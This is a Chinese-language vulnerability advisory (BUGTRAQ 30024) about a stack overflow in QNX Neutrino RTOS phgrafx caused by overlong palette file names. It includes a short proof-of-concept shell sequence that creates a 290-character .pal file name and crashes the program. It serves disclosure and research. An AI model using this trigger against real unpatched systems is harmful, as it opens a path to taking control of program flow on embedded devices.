受影响系统:
QNX Neutrino RTOS 6.3.2
QNX Neutrino RTOS 6.3.0
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 30024
QNX Neutrino RTOS是嵌入系统中所使用的实时操作系统。
QNX RTOS的/usr/photon/bin/phgrafx文件没有正确地处理PHOTON_PATH/palette/*.pal文件,如果用户在palette目录中创建了文件名大于285字符的.pal扩展名的话,就会触发栈溢出,允许攻击者完全控制程序流。
<*来源:Filipe Balestra (
filipe@balestra.com.br)
链接:
http://marc.info/?l=bugtraq&m=121492463823645&w=2
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
# PHOTON_PATH=/tmp
# cd /tmp
# mkdir palette
# cd palette
# touch `perl -e 'print "A" x 290 . ".pal"'`
# /usr/photon/bin/phgrafx
Memory fault (core dumped)
#
建议:
--------------------------------------------------------------------------------
厂商补丁:
QNX
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.qnx.com/
